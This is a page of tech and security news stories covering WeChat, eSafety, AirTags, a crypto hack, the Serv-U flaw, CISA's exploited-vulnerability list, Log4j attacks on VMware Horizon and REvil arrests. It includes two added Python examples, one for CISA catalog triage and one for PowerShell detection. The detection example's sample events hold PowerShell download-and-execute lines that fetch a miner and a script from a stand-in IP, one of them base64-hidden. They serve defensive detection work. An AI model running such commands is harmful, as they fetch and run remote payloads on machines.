More stories

  •

    China accused of hijacking Australia Prime Minister Scott Morrison's WeChat account

    A Liberal member of parliament has accused the Chinese government of foreign interference after Prime Minister Scott Morrison’s account on WeChat was hijacked. “It is a matter of record that the platform has stopped the Prime Minister’s access, while Anthony Albanese’s account is still active featuring posts criticising the government,” Liberal MP Gladys Liu said. “In an election year especially, this sort of interference in our political processes is unacceptable, and this matter should be taken extremely seriously by all Australian politicians.” As part of her accusations against the Chinese government, Liu said she would boycott her official and personal WeChat accounts until the platform explained the incident. Various Coalition members have backed Liu’s accusations and boycott, with Parliamentary Joint Committee on Intelligence and Security chair and Liberal Senator James Paterson calling for Opposition Leader Anthony Albanese to boycott WeChat as well. Stuart Robert, the Minister responsible for digital transformation, told The Today Show on Monday morning that the Prime Minister’s office was seeking to contact the Chinese government about the account hijacking. “It is odd, and of course, the Prime Minister’s office is seeking to connect through to them to work out and get it resolved,” Robert said.

    First reported by NewsCorp Australia, the WeChat account was reportedly renamed, and Morrison had been having trouble accessing it for months; he is now unable to access the account at all. According to Australian Strategic Policy Institute senior analyst Fergus Ryan, Morrison’s account is registered to a Chinese national because WeChat’s policies at the time required accounts to be linked to the ID of either a Chinese national or a business registered in China. In China, WeChat has faced growing regulation, having been put on notice last year for collecting more user data than deemed necessary for the services it offers. Tencent, the company running WeChat, last year also restricted how long minors could play its flagship game Honour of Kings as part of efforts to address government concerns. Under that restriction, Honour of Kings players under the age of 18 are limited to one hour of play on regular days and two hours on public holidays.

  •

    Inman Grant's reappointment as eSafety commissioner comes with new powers

    The federal government has reappointed Julie Inman Grant as the country’s eSafety commissioner. The reappointment coincides with the Online Safety Act, which passed last year, officially coming into effect. “The Online Safety Act commences operation [on Sunday] and Ms Inman Grant’s reappointment provides certainty, particularly to community organisations and industry who have been working with the office of the eSafety Commissioner for some time,” said Paul Fletcher, the Minister for Communications, Urban Infrastructure, Cities and the Arts. Inman Grant was first appointed to the role in 2016, months after the Office of the eSafety Commissioner was established under the Australian Communications and Media Authority (ACMA). During her tenure, the commissioner’s remit has steadily expanded from protecting only children to providing support mechanisms for all Australians online. With the Online Safety Act now in effect, Inman Grant has substantially greater powers, such as being able to order social media platforms and other websites popular among children to remove cyberbullying content within 24 hours. If these entities fail to remove the content, the commissioner can issue fines of up to 500 penalty units, which equates to a maximum of AU$111,000 for individuals and AU$555,000 for companies. While Inman Grant could already order the removal of cyberbullying content aimed at children, the key change to the commissioner’s powers is that she can now also issue orders for cyberbullying content targeted at adults. In addition, the time allowed for online service providers to take down this type of content has been cut in half, from 48 hours to 24 hours.

    Beyond being able to order the removal of cyberbullying content, the eSafety commissioner can also order the takedown of intimate images shared without the subject’s consent, abhorrent violent material, and restricted online content. Online safety has been high on the federal government’s agenda of late, with initiatives such as the Online Safety Youth Advisory Council, the proposal of anti-trolling and online privacy laws, and a federal probe into the practices of major technology companies all coming in the past few months.

  •

    She didn't trust her movers. A single Apple AirTag proved she was right

    C. Osborne | ZDNet
    Apple’s AirTags are getting something of a bad (brand) name. It’s “a perfect tool for stalking,” as Eva Galperin, director of cybersecurity at the Electronic Frontier Foundation, put it to the BBC.

    She’s right, of course. That’s the problem with technology, isn’t it? For every potential good use, there are at least several pain-inducing, criminal-pleasing, world-ending uses. Too often, the bad outweighs the good, especially in the public’s eyes and ears. Here, though, is a tale of a woman who’s glad she used an AirTag for her own surveillance purposes. Valerie McNulty has moved around a few times. She’s an army spouse and she knows the drill. As she told the Military Times, McNulty also knows that moving companies aren’t universally reliable. It’s not just that they can break things or lose things. It’s that, well, they may not always deliver the facts in a way that’s actually factual.

    So McNulty slid an AirTag into one of her family’s moving boxes, one containing her son’s toys. They had a long way to go, from Fort Carson, Colorado to Fort Drum, New York. You’ll be stunned when I tell you the boxes didn’t turn up on time. They were a month late. A promise of a Friday delivery became the promise of a Sunday delivery. You know how these things go. The driver finally called McNulty and told her that he was just picking up her family’s boxes in Colorado. The call didn’t go well. You see, McNulty had already checked the location of her AirTag. She knew it was in Elizabeth, New Jersey, not far from her new home. “I made him aware that I knew he was only four hours away from us,” she told the Military Times. “He called back several minutes later trying to bargain with me to see if he could deliver it on Sunday or Monday.” “Where was the driver?” you might ask. Allegedly seeing a lady friend, said McNulty. And, of course, not all of her family’s boxes arrived. You can completely understand why McNulty used the AirTag in the way she did. This whole tale makes me wonder, though, what we’ve come to and where we’re going. Employers don’t trust remote employees, for example, so they garland them with surveillance technology. Too many humans don’t like or trust each other. So they use technology to abuse each other, stalk each other, hack each other, and even break into their lovers’ gadgets. At the same time, they use technology to stay in touch with each other and work together in ways that were never previously possible. Perhaps we were always as two-sided as this. Ultimately, though, because of the immediacy and ubiquity of technology, the result is an exponentially heightened collective paranoia. If our default is that we can trust no one and fear everyone, how can we ever really get along? How can we ever be at peace?


  •

    CEO responds to complaints of login issues after $31 million hack

    CEO Kris Marszalek responded to complaints from thousands of users about problems logging back into their accounts after the company was forced to change security settings following a hack last week. On Monday, the company admitted that 483 users were affected by unauthorized cryptocurrency withdrawals from their accounts, costing a total of “4,836.26 ETH, 443.93 BTC, and approximately US$66,200 in other cryptocurrencies.” At the time of the attack, that amounted to about $31 million. The company said in a statement that it revoked all customer 2FA tokens and “added additional security hardening measures, which required all customers to re-login and set up their 2FA token to ensure only authorized activity would occur.” But thousands of people have since taken to social media to complain that they could not get back into their accounts. Hundreds of people tweeted at the company begging for help, complaining that support channels were not working. When pressed for comment, the company directed ZDNet to a statement from Marszalek posted to Twitter on Friday evening. “If you can’t get back into our app following access reset this week, in 95/100 cases you are simply using the wrong email to login. We don’t allow duplicate accounts with the same phone number, so you will get stuck if you are using the wrong email,” Marszalek wrote. He urged customers to check their inboxes for emails from the company and said the “one which has it is the one you should use to login into the app.”

    “If you can’t find it, or no longer have access to it, please reach out to our CS. We will authenticate you again. We are helping users with these cases one by one, but it takes time given the scale of our platform. Our team is also working on a new app release that specifically communicates this via UI/UX improvements,” he explained. “Finally, rest assured your funds are safe and waiting for you to log back in... with the right email.” The statement did little to assuage angry customers demanding access to their accounts. The company initially denied reports that funds were stolen, even as PeckShield said around $15 million was being washed through a coin tumbler. By Wednesday, Marszalek was forced to appear on Bloomberg to confirm that about 400 users had been attacked and that users’ ability to withdraw funds had been paused. The company created a program designed to refund users affected by the hack with up to $250,000. The company said terms and conditions “may vary by market according to local regulations” and that it “will make the final determination of eligibility requirements and approval of claims.”

  •

    Log4J: Microsoft discovers attackers targeting undisclosed SolarWinds vulnerability

    Microsoft researchers have discovered a previously undisclosed vulnerability in the SolarWinds Serv-U software while monitoring threats related to the Log4j vulnerabilities. Microsoft researcher Jonathan Bar Or explained on Twitter that while he was hunting for Log4j exploit attempts, he noticed attacks coming from serv-u.exe.


    “Taking a closer look revealed you could feed Serv-U with data and it’ll build a LDAP query with your unsanitized input! This could be used for log4j attack attempts, but also for LDAP injection,” he wrote. “Solarwinds immediately responded, investigated and fixed the #vulnerability. Their response is the quickest I’ve seen, really amazing work on their part!” Microsoft later published a blog post about the issue, tracked as CVE-2021-35247, describing it as an “input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.” In its advisory, SolarWinds said the Serv-U web login screen for LDAP authentication was allowing characters that were not sufficiently sanitized. “SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream effect has been detected as the LDAP servers ignored improper characters,” the company said, adding that the flaw affects Serv-U 15.2.5 and previous versions.

    NTT Application Security’s Ray Kelly told ZDNet that the vulnerability surprised and concerned him, given that SolarWinds is fresh off its previous breach, which affected thousands of customers. “Given that the Log4j disclosure was published in December, this Open Source vulnerability should have been of the utmost priority for SolarWinds. While it appears that SolarWinds was not susceptible to have the vulnerable component exploited, it’s still not something you want in your software product,” Kelly said. “Most all application security products can detect the Log4j vulnerability giving developers the ability to quickly identify and fix the issue.” Microsoft urged customers to apply the security updates described in the SolarWinds advisory and said customers can use Microsoft’s tools to identify and remediate devices that have the vulnerability. Microsoft Defender Antivirus and Microsoft Defender for Endpoint also detect behavior related to the activity, the company added. Netenrich’s John Bambenek said Microsoft’s warning and SolarWinds’ quick response time were a positive example of how vulnerabilities should be handled. “This is the kind of vulnerability and research cooperation we need, where a major tech company with visibility to see the attacks reaches out to the software company and a fix is rushed to production,” Bambenek said.

  •

    CISA adds 13 exploited vulnerabilities to list, 9 with Feb. 1 remediation date

    CISA released its latest update to the Known Exploited Vulnerabilities catalog, adding 13 new vulnerabilities. Nine of the vulnerabilities have a remediation date of February 1 and four of them have a remediation date of July 18. The list includes an October CMS Improper Authentication, a System Information Library for node.js Command Injection vulnerability, an Oracle Corporate Business Intelligence Enterprise Edition Path Traversal vulnerability, an Apache Airflow Experimental API Authentication Bypass vulnerability, a Drupal Core Unrestricted Upload of File vulnerability, and three Nagios XI OS Command Injection vulnerabilities.
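The catalog CISA updates here is published as a JSON feed (known_exploited_vulnerabilities.json on cisa.gov), and the due dates only matter once they are matched against what you actually run. The Python below is an added example, not CISA tooling: it parses a constructed excerpt in the feed's shape, cross-references it with an assumed vendor/product inventory, and orders the matches by days until the due date. Only CVE-2021-32648 is an entry named in the story; the other IDs are deliberately non-real placeholders.

```python
import json
from datetime import date
from typing import Dict, List, Set, Tuple

# Constructed excerpt in the shape of CISA's known_exploited_vulnerabilities.json
# feed. CVE-2021-32648 is named in the story; the CVE-EXAMPLE-* IDs are
# placeholders so the triage has more than one row to sort.
SAMPLE_CATALOG = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2022.01.21",
    "dateReleased": "2022-01-21T00:00:00.0000Z",
    "count": 4,
    "vulnerabilities": [
        {"cveID": "CVE-2021-32648", "vendorProject": "October CMS", "product": "October CMS",
         "vulnerabilityName": "October CMS Improper Authentication", "dateAdded": "2022-01-18",
         "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-02-01"},
        {"cveID": "CVE-EXAMPLE-0002", "vendorProject": "Nagios", "product": "Nagios XI",
         "vulnerabilityName": "Nagios XI OS Command Injection", "dateAdded": "2022-01-18",
         "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-02-01"},
        {"cveID": "CVE-EXAMPLE-0003", "vendorProject": "Apache", "product": "Airflow",
         "vulnerabilityName": "Apache Airflow Experimental API Authentication Bypass",
         "dateAdded": "2022-01-18",
         "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-07-18"},
        {"cveID": "CVE-EXAMPLE-0004", "vendorProject": "Drupal", "product": "Drupal Core",
         "vulnerabilityName": "Drupal Core Unrestricted Upload of File", "dateAdded": "2022-01-18",
         "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-02-01"},
    ],
})


def load_catalog(text: str) -> List[Dict[str, str]]:
    """Parse the feed and return its vulnerability entries, checking the
    advertised count against what was actually received (a truncated download
    should fail loudly rather than silently shorten the list)."""
    data = json.loads(text)
    entries = data["vulnerabilities"]
    if "count" in data and data["count"] != len(entries):
        raise ValueError("catalog count does not match number of entries")
    return entries


def _key(vendor: str, product: str) -> Tuple[str, str]:
    """Case- and whitespace-insensitive (vendorProject, product) match key."""
    return vendor.strip().lower(), product.strip().lower()


def triage(entries: List[Dict[str, str]], inventory: Set[Tuple[str, str]],
           today: str) -> List[Dict[str, object]]:
    """Catalog entries whose (vendorProject, product) pair is in the inventory,
    with days until the CISA due date, most urgent first. `today` is ISO 8601."""
    wanted = {_key(v, p) for v, p in inventory}
    as_of = date.fromisoformat(today)
    rows = []
    for e in entries:
        if _key(e["vendorProject"], e["product"]) not in wanted:
            continue
        due = date.fromisoformat(e["dueDate"])
        rows.append({
            "cveID": e["cveID"],
            "product": e["product"],
            "dueDate": e["dueDate"],
            "days_left": (due - as_of).days,
            "overdue": due < as_of,
        })
    rows.sort(key=lambda r: (r["days_left"], r["cveID"]))
    return rows


if __name__ == "__main__":
    # Assumed inventory for the demonstration: vendor/product pairs as they
    # appear in the feed's vendorProject and product fields.
    inventory = {("Nagios", "Nagios XI"), ("Apache", "Airflow"), ("Microsoft", "Exchange Server")}
    for row in triage(load_catalog(SAMPLE_CATALOG), inventory, "2022-01-24"):
        flag = "OVERDUE" if row["overdue"] else f"{row['days_left']} days"
        print(f"{row['cveID']:<18} {row['product']:<12} due {row['dueDate']} ({flag})")
```

The match is on the feed's own vendorProject/product strings, which are not always spelled the way asset inventories spell them, so in practice the inventory side needs a mapping table; the count check is there because a partial download of the feed otherwise looks like a clean bill of health.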
    The October CMS Improper Authentication vulnerability, CVE-2021-32648, was allegedly used during a cyberattack on Ukrainian government systems last week. A patch was released in September 2021. The Media Trust CEO Chris Olson said the vulnerability’s alleged use in the recent attack on Ukraine explains its inclusion on the list, but he noted that its inclusion highlights “an alarming growth in web-based cyberattacks and the role they will play in global cyber warfare.” “Little attention is paid to the Web as an attack surface. While organizations across the public and private sector are increasingly aware of cyber risk, the stack of third-party code used in Web development rarely meets the standards for AppSec that those organizations would demand from any of their IT systems,” Olson said. Jordan LaRose, director of incident response at F-Secure, told ZDNet that CISA’s guidance matches much of what his team is seeing in the wild from malicious actors. What stood out most to him, LaRose said, is that these are all vulnerabilities affecting web servers or APIs. This is a trend he has seen develop significantly in the past year among malicious actors, many of whom are turning to more than classical methods like phishing or trojans to gain footholds in organizations with strong security postures.

    “What we’re seeing now is a wave of attacks where attackers are targeting technology rather than people, with the most recent notable example being the Log4Shell attacks. These attacks are largely done opportunistically, with attackers loading up scanning scripts with the exploits and hitting everything they can on the internet to find a potential victim,” he said. Neosec vice president Edward Roberts echoed that sentiment, adding that the volume of vulnerabilities involving APIs will continue to increase because more APIs are being developed each day. Most organizations, he said, “don’t even know how many APIs they have, let alone which ones have vulnerabilities, let alone consider how they are being defrauded by abusive behavior.” A number of cybersecurity experts noted that several of these vulnerabilities were identified months ago. Some of the vulnerabilities on the list date back to 2012 and 2013, according to Netenrich principal threat hunter John Bambenek, who expressed concern that they haven’t already been patched. “That the agency doesn’t have basic patch deployment information from other units of government implies there is no central management of that information. The posture of federal IT cybersecurity seems to have remained stalled at square one,” Bambenek said. “If an exploited vulnerability can be used to execute commands on the victim machine, then CISA sets a two week due date to patch. That being said, two weeks is far too slow. The Exchange vulnerability concerns me the most, however, some of this stuff is quite off the beaten path. But, this may be common in government installations so worthy to put on the list.” Vulcan Cyber CPO Tal Morgenstern noted that seven of the vulnerabilities with remediation dates of February 1 relate to systems management tools. “Systems management tools from VMware, Nagios, F5, Npm and more hold the keys to the kingdom giving the user substantial power to automate system change for good or bad. This isn’t a new concern as we’ve seen an unfortunate trend of vulnerabilities in systems management software tools this year,” Morgenstern explained. “Considering the amount of access and control these tools have, IT security teams must take immediate steps to fully mitigate known risks. Don’t wait for February. Move now.”

  •

    Log4J: Attackers continue targeting VMware Horizon servers

    According to several cybersecurity companies monitoring the situation, attackers are still targeting VMware Horizon servers through the Log4j vulnerabilities.


    Two weeks ago, the UK’s National Health Service (NHS) warned that an ‘unknown threat group’ was attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and carry out other attacks. Since then, several cybersecurity companies have confirmed that attackers are continuing to target VMware Horizon servers. In a statement to ZDNet, VMware said it continues to urge customers to apply the latest guidance in its security advisory, VMSA-2021-0028, to resolve CVE-2021-44228 and CVE-2021-45046. “We also recommend that customers visit our corresponding Questions & Answers document for the latest information and join the VMware Security-Announce mailing list for all future advisories. Any service connected to the internet and not yet patched for Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046 is vulnerable to hackers, and VMware strongly recommends patching,” a VMware spokesperson said. Rapid7 said it began monitoring a sudden increase in VMware Horizon exploitation on January 14 and identified five distinct post-exploitation paths, signalling that multiple actors are involved in this mass exploitation activity. “The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system,” Rapid7 explained. Huntress published its own blog post on the issue, noting that, according to Shodan, about 25,000 Horizon servers are currently internet-accessible worldwide.
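The post-exploitation pattern Rapid7 describes, PowerShell spawned under the Horizon web server and using System.Net.WebClient to fetch a payload, is easy to hunt for in process-creation telemetry even when the Log4j request itself was never logged. The Python below is an added example, not Rapid7's or Huntress's detection logic: it runs two rules over constructed process-creation events (web-server parent spawning a shell; PowerShell with download-and-execute markers, including a payload hidden behind -EncodedCommand). The parent image names for the Horizon Tomcat service are an assumption; replace them with what your own telemetry shows.

```python
import base64
import re
from typing import Dict, Iterable, List, Tuple

# Assumption for this example: image names of the Horizon Connection Server's
# Tomcat service. Replace with the names observed in your own telemetry.
WEB_SERVER_PARENTS = {"ws_tomcatservice.exe", "tomcat9.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-and-execute markers matching the post-exploitation described above.
_DOWNLOAD_RE = re.compile(
    r"system\.net\.webclient|downloadstring|downloadfile|invoke-webrequest"
    r"|\biex\b|invoke-expression",
    re.IGNORECASE,
)
# -EncodedCommand and its short forms, followed by the base64 blob.
_ENCODED_RE = re.compile(r"(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def expand_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    markers are visible even when the operator hid them."""
    m = _ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error (bad padding) is a ValueError subclass
        return cmdline
    return f"{cmdline} {decoded}"


def classify(event: Dict[str, str]) -> List[str]:
    """Names of the detections that fire for one process-creation event."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmdline = expand_encoded_command(event.get("command_line", ""))
    hits: List[str] = []
    if parent in WEB_SERVER_PARENTS and image in SHELLS:
        hits.append("web_server_spawned_shell")
    if image in POWERSHELL and _DOWNLOAD_RE.search(cmdline):
        hits.append("powershell_webclient_download")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(event id, detections) for every event that triggers at least one rule."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event["id"], hits))
    return results


# Constructed sample events (not real telemetry). e2 carries the same WebClient
# call as e1 but hidden behind -enc; e3 is benign interactive use.
_HIDDEN = ("(New-Object System.Net.WebClient).DownloadFile("
           "'http://203.0.113.7/miner.exe','C:\\Windows\\Temp\\svc.exe')")
_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "e1", "parent_image": _TOMCAT, "image": _PS,
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object System.Net.WebClient)"
                     ".DownloadString('http://203.0.113.7/run.ps1')\""},
    {"id": "e2", "parent_image": _TOMCAT, "image": _PS,
     "command_line": "powershell.exe -nop -enc "
                     + base64.b64encode(_HIDDEN.encode("utf-16-le")).decode()},
    {"id": "e3", "parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": "powershell.exe -c Get-Process"},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(event_id, ", ".join(hits))
```

The first rule is the high-signal one: a web application server has no business launching a shell, so it fires regardless of what the shell does next (web shell, miner, Cobalt Strike). The second rule is there because the same download pattern also shows up under other parents once the actor has moved off the initial foothold.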

    Roger Koehler, vice president of threat operations at Huntress, told ZDNet the NHS article didn’t convey the scope of the problem. “Based on how many Horizon servers in our data set are unpatched (only 18% were patched as of last Friday night), there is a high risk of this seriously impacting hundreds, if not the low thousands, of businesses. This weekend also marks the first time we’ve seen proof of widespread escalation, going from gaining initial access to starting to take hostile actions on Horizon servers,” Koehler said. “Since we’re seeing multiple likely unrelated campaigns (cryptominers, web shells, Cobalt Strike), it’s likely that this will continue to escalate. Attackers are going to make businesses pay for not fully patching when VMware gave their initial guidance. Although the initial web shell campaign appears to focus on long-term access, it’s likely that future activity will focus on targeting or impacting the systems accessible via VMware Horizon. And it makes sense: attackers can use this access to impact all the virtualized hosts and servers.” Koehler added that these are high-value targets, and people are not patching despite multiple, widespread campaigns targeting them, noting that Huntress recently watched the same thing happen with ProxyShell and ProxyLogon. While those were not quite as significant and far-reaching as this latest activity, they serve as evidence that attackers will likely be back for systems that haven’t yet been patched, Koehler explained. He said ProxyShell surfaced months after ProxyLogon was disclosed, and it was made possible only because many had failed to properly patch. “The timing is also significant. If we think back to the big Kaseya incident, they picked the July 4 holiday weekend. The original widespread intrusion with web shells took place over the Christmas holiday (they were dropped between December 25 and December 29), and things are escalating now that it’s another three-day weekend in the US. Is damage control going to become a holiday tradition for those in cybersecurity?” Koehler said. “The web shell attack between December 25 and 29 was more sophisticated compared to something like the Exchange attack. It seems like the majority of antivirus tools failed to identify that anything was wrong and still haven’t caught up. The moral of this story? It’s the same old song: patch, patch, patch.”

  •

    After ransomware arrests, some dark web criminals are getting worried

    Cyber criminals are becoming anxious about being tracked down by law enforcement agencies following the high-profile arrests of suspected members of one of the most notorious ransomware groups. On January 14, Russia’s Federal Security Service (FSB) announced it had detained members of the REvil ransomware gang operating from several regions of the country and dismantled the group’s operations. Earlier action by Europol had resulted in the arrest of a suspected REvil affiliate near the Polish-Ukrainian border.


    According to analysis of chatter on dark web forums by cybersecurity researchers at Trustwave SpiderLabs, the recent arrests, particularly those by Russia, appear to have scared cyber criminals, some of whom seem worried that they might be next. Ransomware is one of the biggest cybersecurity issues facing organisations and the wider world today, with a string of incidents demonstrating how such attacks can disrupt utilities, healthcare, food production and other vital services that people need every day, while cyber criminals walk away with huge sums of money when victims give in and pay the ransom demanded for a decryption key. There is a consensus among cybersecurity experts that many of the major ransomware operations work out of Russia, with the authorities willing to turn a blind eye to attacks targeting the West. But following arrests throughout the region, some cyber criminals are wondering if the risk is worth it. “This is a big change. I have no desire to go to jail,” wrote one forum member.

    “In fact, one thing is clear, those who expect that the state would protect them will be greatly disappointed,” said another. There is even concern that administrators of the dark web communities, who would hold details about their users, could be coerced into working for law enforcement following arrest. Such is the paranoia among some forum members and ransomware affiliates that they suggest moving operations to a different jurisdiction, although this is unlikely to be a realistic option for many. “Those that are seasoned in cybercrime understand that by moving outside of Russia, they’ll be taking on an even greater risk of being arrested by international law enforcement agencies. These agencies that are keeping tabs on cyber criminals will be watching for such potential moves,” Ziv Mador, VP security research at Trustwave SpiderLabs, told ZDNet. “Also, there is a large talent pool in Russia already, so more members and affiliates can always be recruited. Recruiting can become more difficult in other geographies. There is a level of trust that is required, and that trust diminishes the further away a prospective member is from ‘home base’,” he added. However, while some users are anxious following the arrests, others are less sympathetic, blaming a string of high-profile attacks against major targets in the United States for the unwelcome attention. “It was necessary to think before climbing and encrypting multi-billion-dollar companies, schools, states. With whom did they dare to compete?” one user wrote. “They climbed everywhere indiscriminately without understanding which country [they were attacking],” said another. “Some cyber criminals may feel like REvil spoiled the ability to earn a living by attracting too much law enforcement attention and political powers. This kind of activity may have triggered a lack of sympathy by forum members,” said Mador.